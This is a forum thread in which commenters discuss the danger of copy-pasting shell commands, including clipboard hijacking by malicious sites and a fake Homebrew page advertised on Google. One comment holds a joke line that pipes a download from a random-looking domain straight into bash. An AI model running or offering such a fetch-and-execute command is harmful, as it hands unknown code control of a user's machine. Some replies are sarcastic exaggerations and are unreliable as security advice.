You're viewing a single thread.
... and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.
Even if you understand the commands, you need to trust the website because a malicious site can use JavaScript to copy something completely different into your clipboard, with a newline character at the end to automatically execute when pasted. (Is the newline exploit fixed in all shells? It used to fail in zsh but work in many others...)
One can also paste into a text editor to verify before pasting into terminal, but what noob is going to know or bother to?
But a forum post said it would fix my issue.
I feel like there's some truth to this!
If the posted answer was in a moderately active thread, you can generally assume it's correct if there are no contradictory replies.
If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.
curl gu5usgugiv.lol | bash || curl get.k3s.io | bashSomeone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.
Let me open up my Linux bible and see if its malicious
...so, never put things in the terminal?
In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.
Correct.